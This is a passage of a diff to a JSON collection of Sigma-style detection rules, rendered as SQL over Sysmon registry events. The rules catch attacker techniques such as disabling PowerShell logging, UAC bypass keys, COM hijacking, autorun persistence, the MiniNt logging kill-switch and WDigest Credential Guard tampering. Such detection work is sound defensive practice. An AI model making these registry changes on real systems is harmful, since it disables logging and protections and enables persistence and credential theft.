'%\\\\ScriptBlockLogging\\\\EnableScriptBlockInvocationLogging' ESCAPE '\\' OR TargetObject LIKE '%\\\\Transcription\\\\EnableTranscripting' ESCAPE '\\' OR TargetObject LIKE '%\\\\Transcription\\\\EnableInvocationHeader' ESCAPE '\\' OR TargetObject LIKE '%\\\\EnableScripts' ESCAPE '\\') AND Details = 'DWORD (0x00000000)')" ], - "filename": "registry_set_powershell_as_service.yml" + "filename": "registry_set_powershell_logging_disabled.yml" }, { - "title": "Outlook Macro Execution Without Warning Setting Enabled", - "id": "e3b50fa5-3c3f-444e-937b-0a99d33731cd", - "status": "test", - "description": "Detects the modification of Outlook security setting to allow unprompted execution of macros.", - "author": "@ScoubiMtl", + "title": "Allow RDP Remote Assistance Feature", + "id": "37b437cf-3fc5-4c8e-9c94-1d7c9aff842b", + "status": "experimental", + "description": "Detect enable rdp feature to allow specific user to rdp connect on the targeted machine", + "author": "frack113", "tags": [ - "attack.persistence", - "attack.command_and_control", - "attack.t1137", - "attack.t1008", - "attack.t1546" + "attack.defense_evasion", + "attack.t1112" ], "falsepositives": [ - "Unlikely" + "Legitimate use of the feature (alerts should be investigated either way)" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\Outlook\\\\Security\\\\Level' ESCAPE '\\' AND Details LIKE '%0x00000001%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%System\\\\CurrentControlSet\\\\Control\\\\Terminal Server\\\\fAllowToGetHelp' ESCAPE '\\' AND Details = 'DWORD (0x00000001)')" ], - "filename": "registry_set_office_outlook_enable_macro_execution.yml" + "filename": "registry_set_allow_rdp_remote_assistance_feature.yml" }, { - "title": "Bypass UAC Using DelegateExecute", - "id": "46dd5308-4572-4d12-aa43-8938f0184d4f", - "status": "test", - "description": "Bypasses User Account Control using a fileless method", + "title": "Potential Persistence Using DebugPath", + "id": "df4dc653-1029-47ba-8231-3c44238cc0ae", + "status": "experimental", + "description": "Detects potential persistence using Appx DebugPath", "author": "frack113", "tags": [ - "attack.privilege_escalation", - "attack.defense_evasion", - "attack.t1548.002" + "attack.persistence", + "attack.t1546.015" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\open\\\\command\\\\DelegateExecute' ESCAPE '\\' AND Details = '(Empty)')" + "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((EventType = 'SetValue' AND TargetObject LIKE '%Classes\\\\ActivatableClasses\\\\Package\\\\Microsoft.%' ESCAPE '\\' AND TargetObject LIKE '%\\\\DebugPath' ESCAPE '\\') OR (EventType = 'SetValue' AND TargetObject LIKE '%\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\PackagedAppXDebug\\\\Microsoft.%' ESCAPE '\\' AND TargetObject LIKE '%\\\\(Default)' ESCAPE '\\')))" ], - "filename": "registry_set_bypass_uac_using_delegateexecute.yml" + "filename": "registry_set_persistence_appx_debugger.yml" }, { - "title": "CurrentVersion NT Autorun Keys Modification", - "id": "cbf93e5d-ca6c-4722-8bea-e9119007c248", + "title": "Potential Persistence Via Outlook Today Pages", + "id": "487bb375-12ef-41f6-baae-c6a1572b4dd1", "status": "experimental", - "description": "Detects modification of autostart extensibility point (ASEP) in registry.", - "author": "Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)", + "description": "Detects potential persistence activity via outlook today pages. An attacker can set a custom page to execute arbitrary code and link to it via the registry key \"UserDefinedUrl\".", + "author": "Tobias Michalski (Nextron Systems)", "tags": [ "attack.persistence", - "attack.t1547.001" + "attack.t1112" ], "falsepositives": [ - "Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason", - "Legitimate administrator sets up autorun keys for legitimate reason" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion%' ESCAPE '\\' AND (TargetObject LIKE '%\\\\Winlogon\\\\VmApplet%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Winlogon\\\\Userinit%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Winlogon\\\\Taskman%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Winlogon\\\\Shell%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Winlogon\\\\GpExtensions%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Winlogon\\\\AppSetup%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Winlogon\\\\AlternateShells\\\\AvailableShells%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Windows\\\\IconServiceLib%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Windows\\\\Appinit\\_Dlls%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Image File Execution Options%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Font Drivers%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Drivers32%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Windows\\\\Run%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Windows\\\\Load%' ESCAPE '\\')) AND NOT ((Details = '(Empty)') OR (TargetObject LIKE '%\\\\Image File Execution Options\\\\%' ESCAPE '\\' AND (TargetObject LIKE '%\\\\DisableExceptionChainValidation' ESCAPE '\\' OR TargetObject LIKE '%\\\\MitigationOptions' ESCAPE '\\')) OR (Image LIKE 'C:\\\\Program Files (x86)\\\\Microsoft\\\\Temp\\\\%' ESCAPE '\\' AND Image LIKE '%\\\\MicrosoftEdgeUpdate.exe' ESCAPE '\\') OR ((TargetObject LIKE '%\\\\ClickToRunStore\\\\HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\ClickToRun\\\\REGISTRY\\\\MACHINE\\\\Software\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\%' ESCAPE '\\') OR (Image LIKE 'C:\\\\Program Files\\\\Microsoft Office\\\\root\\\\integration\\\\integrator.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files (x86)\\\\Microsoft Office\\\\root\\\\integration\\\\integrator.exe' ESCAPE '\\')) OR ((Image LIKE 'C:\\\\Program Files\\\\Common Files\\\\Microsoft Shared\\\\ClickToRun\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files\\\\Common Files\\\\Microsoft Shared\\\\ClickToRun\\\\Updates\\\\%' ESCAPE '\\') AND Image LIKE '%\\\\OfficeClickToRun.exe' ESCAPE '\\') OR (Image LIKE 'C:\\\\Windows\\\\system32\\\\svchost.exe' ESCAPE '\\' AND (TargetObject LIKE '%\\\\Winlogon\\\\GPExtensions\\\\{827D319E-6EAC-11D2-A4EA-00C04F79F83A}\\\\PreviousPolicyAreas%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Winlogon\\\\GPExtensions\\\\{827D319E-6EAC-11D2-A4EA-00C04F79F83A}\\\\MaxNoGPOListChangesInterval%' ESCAPE '\\') AND Details IN ('DWORD (0x00000009)', 'DWORD (0x000003c0)')) OR (Image LIKE 'C:\\\\Windows\\\\Microsoft.NET\\\\Framework%' ESCAPE '\\' AND Image LIKE '%\\\\ngen.exe' ESCAPE '\\') OR (Image LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\OneDrive\\\\StandaloneUpdater\\\\OneDriveSetup.exe' ESCAPE '\\' AND TargetObject LIKE '%\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\RunOnce\\\\Delete Cached Update Binary' ESCAPE '\\' AND Details LIKE 'C:\\\\Windows\\\\system32\\\\cmd.exe /q /c del /q \"C:\\\\Users\\\\%' ESCAPE '\\' AND Details LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\OneDrive\\\\Update\\\\OneDriveSetup.exe\"' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((EventType = 'SetValue' AND TargetObject LIKE '%Software\\\\Microsoft\\\\Office\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\Outlook\\\\Today\\\\%' ESCAPE '\\') AND ((TargetObject LIKE '%Stamp' ESCAPE '\\' AND Details = 'DWORD (0x00000001)') OR TargetObject LIKE '%UserDefinedUrl' ESCAPE '\\')) AND NOT (((Image LIKE 'C:\\\\Program Files\\\\Common Files\\\\Microsoft Shared\\\\ClickToRun\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files\\\\Common Files\\\\Microsoft Shared\\\\ClickToRun\\\\Updates\\\\%' ESCAPE '\\') AND Image LIKE '%\\\\OfficeClickToRun.exe' ESCAPE '\\')))" ], - "filename": "registry_set_asep_reg_keys_modification_currentversion_nt.yml" + "filename": "registry_set_persistence_outlook_todaypage.yml" }, { - "title": "Registry Hide Function from User", - "id": "5a93eb65-dffa-4543-b761-94aa60098fb6", - "status": "test", - "description": "Detects registry modifications that hide internal tools or functions from the user (malware like Agent Tesla, Hermetic Wiper uses this technique)", + "title": "Registry Disable System Restore", + "id": "5de03871-5d46-4539-a82d-3aa992a69a83", + "status": "experimental", + "description": "Detects the modification of the registry to disable a system restore on the computer", "author": "frack113", "tags": [ - "attack.defense_evasion", - "attack.t1112" + "attack.impact", + "attack.t1490" ], "falsepositives": [ - "Legitimate admin script" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((EventType = 'SetValue' AND (TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\HideClock' ESCAPE '\\' OR TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\HideSCAHealth' ESCAPE '\\' OR TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\HideSCANetwork' ESCAPE '\\' OR TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\HideSCAPower' ESCAPE '\\' OR TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\HideSCAVolume' ESCAPE '\\') AND Details = 'DWORD (0x00000001)') OR (EventType = 'SetValue' AND (TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Explorer\\\\Advanced\\\\ShowInfoTip' ESCAPE '\\' OR TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Explorer\\\\Advanced\\\\ShowCompColor' ESCAPE '\\') AND Details = 'DWORD (0x00000000)')))" + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'Setvalue' AND (TargetObject LIKE '%\\\\Policies\\\\Microsoft\\\\Windows NT\\\\SystemRestore%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\SystemRestore%' ESCAPE '\\') AND (TargetObject LIKE '%DisableConfig' ESCAPE '\\' OR TargetObject LIKE '%DisableSR' ESCAPE '\\') AND Details = 'DWORD (0x00000001)')" ], - "filename": "registry_set_hide_function_user.yml" + "filename": "registry_set_disable_system_restore.yml" }, { - "title": "Potential Persistence Using DebugPath", - "id": "df4dc653-1029-47ba-8231-3c44238cc0ae", + "title": "Potential Qakbot Registry Activity", + "id": "1c8e96cd-2bed-487d-9de0-b46c90cade56", "status": "experimental", - "description": "Detects potential persistence using Appx DebugPath", - "author": "frack113", + "description": "Detects a registry key used by IceID in a campaign that distributes malicious OneNote files", + "author": "Hieu Tran", "tags": [ - "attack.persistence", - "attack.t1546.015" + "attack.defense_evasion", + "attack.t1112" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((EventType = 'SetValue' AND TargetObject LIKE '%Classes\\\\ActivatableClasses\\\\Package\\\\Microsoft.%' ESCAPE '\\' AND TargetObject LIKE '%\\\\DebugPath' ESCAPE '\\') OR (EventType = 'SetValue' AND TargetObject LIKE '%\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\PackagedAppXDebug\\\\Microsoft.%' ESCAPE '\\' AND TargetObject LIKE '%\\\\(Default)' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID IN ('12', '13', '14') AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetObject LIKE '%\\\\Software\\\\firm\\\\soft\\\\Name' ESCAPE '\\')" ], - "filename": "registry_set_persistence_appx_debugger.yml" + "filename": "registry_event_malware_qakbot_registry.yml" }, { - "title": "Change User Account Associated with the FAX Service", - "id": "e3fdf743-f05b-4051-990a-b66919be1743", - "status": "experimental", - "description": "Detect change of the user account associated with the FAX service to avoid the escalation problem.", - "author": "frack113", + "title": "Disable Security Events Logging Adding Reg Key MiniNt", + "id": "919f2ef0-be2d-4a7a-b635-eb2b41fde044", + "status": "test", + "description": "Detects the addition of a key 'MiniNt' to the registry. Upon a reboot, Windows Event Log service will stopped write events.", + "author": "Ilyas Ochkov, oscd.community", "tags": [ "attack.defense_evasion", + "attack.t1562.001", "attack.t1112" ], "falsepositives": [ @@ -33546,1169 +33295,1278 @@ ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND TargetObject LIKE 'HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\Fax\\\\ObjectName' ESCAPE '\\' AND NOT (Details LIKE '%NetworkService%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID IN ('12', '13', '14') AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((TargetObject LIKE 'HKLM\\\\SYSTEM\\\\CurrentControlSet\\\\Control\\\\MiniNt' ESCAPE '\\' AND EventType = 'CreateKey') OR NewName LIKE 'HKLM\\\\SYSTEM\\\\CurrentControlSet\\\\Control\\\\MiniNt' ESCAPE '\\'))" ], - "filename": "registry_set_fax_change_service_user.yml" + "filename": "registry_event_disable_security_events_logging_adding_reg_key_minint.yml" }, { - "title": "Disable Windows Security Center Notifications", - "id": "3ae1a046-f7db-439d-b7ce-b8b366b81fa6", - "status": "experimental", - "description": "Detect set UseActionCenterExperience to 0 to disable the windows security center notification", - "author": "frack113", + "title": "Registry Entries For Azorult Malware", + "id": "f7f9ab88-7557-4a69-b30e-0a8f91b3a0e7", + "status": "test", + "description": "Detects the presence of a registry key created during Azorult execution", + "author": "Trent Liffick", "tags": [ - "attack.defense_evasion", + "attack.execution", "attack.t1112" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%Windows\\\\CurrentVersion\\\\ImmersiveShell\\\\UseActionCenterExperience' ESCAPE '\\' AND Details = 'DWORD (0x00000000)')" + "SELECT * FROM logs WHERE (EventID IN ('12', '13', '14') AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventID IN ('12', '13') AND TargetObject LIKE '%SYSTEM\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\services\\\\localNETService' ESCAPE '\\')" ], - "filename": "registry_set_disable_security_center_notifications.yml" + "filename": "registry_event_mal_azorult.yml" }, { - "title": "Enable Microsoft Dynamic Data Exchange", - "id": "63647769-326d-4dde-a419-b925cc0caf42", + "title": "DLL Load via LSASS", + "id": "b3503044-60ce-4bf4-bbcb-e3db98788823", "status": "test", - "description": "Enable Dynamic Data Exchange protocol (DDE) in all supported editions of Microsoft Word or Excel.", - "author": "frack113", + "description": "Detects a method to load DLL via LSASS process using an undocumented Registry key", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.execution", - "attack.t1559.002" + "attack.persistence", + "attack.t1547.008" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((EventType = 'SetValue' AND TargetObject LIKE '%\\\\Word\\\\Security\\\\AllowDDE' ESCAPE '\\' AND Details IN ('DWORD (0x00000001)', 'DWORD (0x00000002)')) OR (EventType = 'SetValue' AND (TargetObject LIKE '%\\\\Excel\\\\Security\\\\DisableDDEServerLaunch' ESCAPE '\\' OR TargetObject LIKE '%\\\\Excel\\\\Security\\\\DisableDDEServerLookup' ESCAPE '\\') AND Details = 'DWORD (0x00000000)')))" + "SELECT * FROM logs WHERE ((EventID IN ('12', '13', '14') AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (TargetObject LIKE '%\\\\CurrentControlSet\\\\Services\\\\NTDS\\\\DirectoryServiceExtPt%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CurrentControlSet\\\\Services\\\\NTDS\\\\LsaDbExtPt%' ESCAPE '\\') AND NOT ((Image LIKE 'C:\\\\Windows\\\\system32\\\\lsass.exe' ESCAPE '\\' AND (Details LIKE '\\%\\%systemroot\\%\\%\\\\system32\\\\ntdsa.dll' ESCAPE '\\' OR Details LIKE '\\%\\%systemroot\\%\\%\\\\system32\\\\lsadb.dll' ESCAPE '\\'))))" ], - "filename": "registry_set_office_enable_dde.yml" + "filename": "registry_event_susp_lsass_dll_load.yml" }, { - "title": "Potential Persistence Via COM Hijacking From Suspicious Locations", - "id": "3d968d17-ffa4-4bc0-bfdc-f139de76ce77", - "status": "experimental", - "description": "Detects potential COM object hijacking where the \"Server\" (In/Out) is pointing to a supsicious or unsuale location", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Suspicious Run Key from Download", + "id": "9c5037d1-c568-49b3-88c7-9846a5bdc2be", + "status": "test", + "description": "Detects the suspicious RUN keys created by software located in Download or temporary Outlook/Internet Explorer directories", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.persistence", - "attack.t1546.015" + "attack.t1547.001" ], "falsepositives": [ - "Probable legitimate applications. If you find these please add them to an exclusion list" + "Software installers downloaded and used by users" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND (TargetObject LIKE 'HKCR\\\\CLSID\\\\%' ESCAPE '\\' OR TargetObject LIKE 'HKEY\\_CLASSES\\_ROOT\\\\CLSID\\\\%' ESCAPE '\\' OR TargetObject LIKE 'HKCU\\\\Software\\\\Classes\\\\CLSID\\\\%' ESCAPE '\\' OR TargetObject LIKE 'HKEY\\_CURRENT\\_USER\\\\Software\\\\Classes\\\\CLSID\\\\%' ESCAPE '\\') AND (TargetObject LIKE '%\\\\InprocServer32\\\\(Default)' ESCAPE '\\' OR TargetObject LIKE '%\\\\LocalServer32\\\\(Default)' ESCAPE '\\') AND (Details LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR Details LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR Details LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR Details LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR Details LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR Details LIKE '%\\\\Microsoft\\\\Windows\\\\Start Menu\\\\Programs\\\\Startup\\\\%' ESCAPE '\\' OR Details LIKE '%\\\\System32\\\\spool\\\\drivers\\\\color\\\\%' ESCAPE '\\' OR Details LIKE '%\\%temp\\%%' ESCAPE '\\' OR Details LIKE '%\\%tmp\\%%' ESCAPE '\\' OR Details LIKE '%\\%appdata\\%%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID IN ('12', '13', '14') AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (Image LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Temporary Internet Files\\\\Content.Outlook\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Local Settings\\\\Temporary Internet Files\\\\%' ESCAPE '\\') AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\%' ESCAPE '\\')" ], - "filename": "registry_set_persistence_com_hijacking_susp_locations.yml" + "filename": "registry_event_susp_download_run_key.yml" }, { - "title": "Changing RDP Port to Non Standard Number", - "id": "509e84b9-a71a-40e0-834f-05470369bd1e", + "title": "Pandemic Registry Key", + "id": "47e0852a-cf81-4494-a8e6-31864f8c86ed", "status": "test", - "description": "Remote desktop is a common feature in operating systems.\nIt allows a user to log into an interactive session with a system desktop graphical user interface on a remote system.\nMicrosoft refers to its implementation of the Remote Desktop Protocol (RDP) as Remote Desktop Services (RDS).\n", - "author": "frack113", + "description": "Detects Pandemic Windows Implant", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.t1547.010" + "attack.lateral_movement", + "attack.t1105" + ], + "falsepositives": [ + "Unknown" + ], + "level": "critical", + "rule": [ + "SELECT * FROM logs WHERE (EventID IN ('12', '13', '14') AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetObject LIKE '%\\\\SYSTEM\\\\CurrentControlSet\\\\services\\\\null\\\\Instance%' ESCAPE '\\')" + ], + "filename": "registry_event_apt_pandemic.yml" + }, + { + "title": "UAC Bypass Via Wsreset", + "id": "6ea3bf32-9680-422d-9f50-e90716b12a66", + "status": "test", + "description": "Unfixed method for UAC bypass from windows 10. WSReset.exe file associated with the Windows Store. It will run a binary file contained in a low-privilege registry.", + "author": "oscd.community, Dmitry Uchakin", + "tags": [ + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1548.002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND TargetObject LIKE 'HKLM\\\\System\\\\CurrentControlSet\\\\Control\\\\Terminal Server\\\\WinStations\\\\RDP-Tcp\\\\PortNumber' ESCAPE '\\') AND NOT (Details = 'DWORD (0x00000d3d)'))" + "SELECT * FROM logs WHERE (EventID IN ('12', '13', '14') AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetObject LIKE '%\\\\AppX82a6gwre4fdg3bt635tn5ctqjf8msdd2\\\\Shell\\\\open\\\\command' ESCAPE '\\')" ], - "filename": "registry_set_change_rdp_port.yml" + "filename": "registry_event_bypass_via_wsreset.yml" }, { - "title": "Common Autorun Keys Modification", - "id": "f59c3faf-50f3-464b-9f4c-1b67ab512d99", + "title": "Wdigest CredGuard Registry Modification", + "id": "1a2d6c47-75b0-45bd-b133-2c0be75349fd", + "status": "test", + "description": "Detects potential malicious modification of the property value of IsCredGuardEnabled from\nHKLM:\\SYSTEM\\CurrentControlSet\\Control\\SecurityProviders\\WDigest to disable Cred Guard on a system.\nThis is usually used with UseLogonCredential to manipulate the caching credentials.\n", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "tags": [ + "attack.defense_evasion", + "attack.t1112" + ], + "falsepositives": [ + "Unknown" + ], + "level": "high", + "rule": [ + "SELECT * FROM logs WHERE (EventID IN ('12', '13', '14') AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetObject LIKE '%\\\\IsCredGuardEnabled' ESCAPE '\\')" + ], + "filename": "registry_event_disable_wdigest_credential_guard.yml" + }, + { + "title": "Registry Persistence Mechanisms in Recycle Bin", + "id": "277efb8f-60be-4f10-b4d3-037802f37167", "status": "experimental", - "description": "Detects modification of autostart extensibility point (ASEP) in registry.", - "author": "Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split), wagga (name)", + "description": "Detects persistence registry keys for Recycle Bin", + "author": "frack113", "tags": [ "attack.persistence", - "attack.t1547.001" + "attack.t1547" ], "falsepositives": [ - "Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason", - "Legitimate administrator sets up autorun keys for legitimate reason" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND (TargetObject LIKE '%\\\\SOFTWARE\\\\Wow6432Node\\\\Microsoft\\\\Windows CE Services\\\\AutoStart%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Software\\\\Wow6432Node\\\\Microsoft\\\\Command Processor\\\\Autorun%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Wow6432Node\\\\Microsoft\\\\Active Setup\\\\Installed Components%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows CE Services\\\\AutoStartOnDisconnect%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows CE Services\\\\AutoStartOnConnect%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SYSTEM\\\\Setup\\\\CmdLine%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Software\\\\Microsoft\\\\Ctf\\\\LangBarAddin%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Software\\\\Microsoft\\\\Command Processor\\\\Autorun%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Active Setup\\\\Installed Components%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Classes\\\\Protocols\\\\Handler%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Classes\\\\Protocols\\\\Filter%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Classes\\\\Htmlfile\\\\Shell\\\\Open\\\\Command\\\\(Default)%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Environment\\\\UserInitMprLogonScript%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows\\\\Control Panel\\\\Desktop\\\\Scrnsave.exe%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Software\\\\Microsoft\\\\Internet Explorer\\\\UrlSearchHooks%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Internet Explorer\\\\Desktop\\\\Components%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Software\\\\Classes\\\\Clsid\\\\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\\\\Inprocserver32%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Control Panel\\\\Desktop\\\\Scrnsave.exe%' ESCAPE '\\')) AND NOT ((Details = '(Empty)') OR ((TargetObject LIKE '%\\\\Office\\\\ClickToRun\\\\REGISTRY\\\\MACHINE\\\\Software\\\\Classes\\\\PROTOCOLS\\\\Handler\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\ClickToRunStore\\\\HKMU\\\\SOFTWARE\\\\Classes\\\\PROTOCOLS\\\\Handler\\\\%' ESCAPE '\\') OR Details IN ('{314111c7-a502-11d2-bbca-00c04f8ec294}', '{3459B272-CC19-4448-86C9-DDC3B4B2FAD3}', '{42089D2D-912D-4018-9087-2B87803E93FB}', '{5504BE45-A83B-4808-900A-3A5C36E7F77A}', '{807583E5-5146-11D5-A672-00B0D022E945}')) OR (TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Active Setup\\\\Installed Components\\\\{8A69D345-D564-463c-AFF1-A69D9E530F96}\\\\%' ESCAPE '\\') OR (TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Active Setup\\\\Installed Components\\\\{9459C573-B17A-45AE-9F64-1857B5D58CEE}\\\\%' ESCAPE '\\') OR (TargetObject LIKE '%\\\\Software\\\\Microsoft\\\\Active Setup\\\\Installed Components\\\\{89820200-ECBD-11cf-8B85-00AA005B4383}\\\\%' ESCAPE '\\') OR ((Image LIKE 'C:\\\\Windows\\\\System32\\\\poqexec.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files (x86)\\\\Microsoft Office\\\\root\\\\integration\\\\integrator.exe' ESCAPE '\\')) OR ((Image LIKE 'C:\\\\Program Files\\\\Common Files\\\\Microsoft Shared\\\\ClickToRun\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files\\\\Common Files\\\\Microsoft Shared\\\\ClickToRun\\\\Updates\\\\%' ESCAPE '\\') AND Image LIKE '%\\\\OfficeClickToRun.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID IN ('12', '13', '14') AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((EventType = 'RenameKey' AND NewName LIKE '%\\\\CLSID\\\\{645FF040-5081-101B-9F08-00AA002F954E}\\\\shell\\\\open%' ESCAPE '\\') OR (EventType = 'SetValue' AND TargetObject LIKE 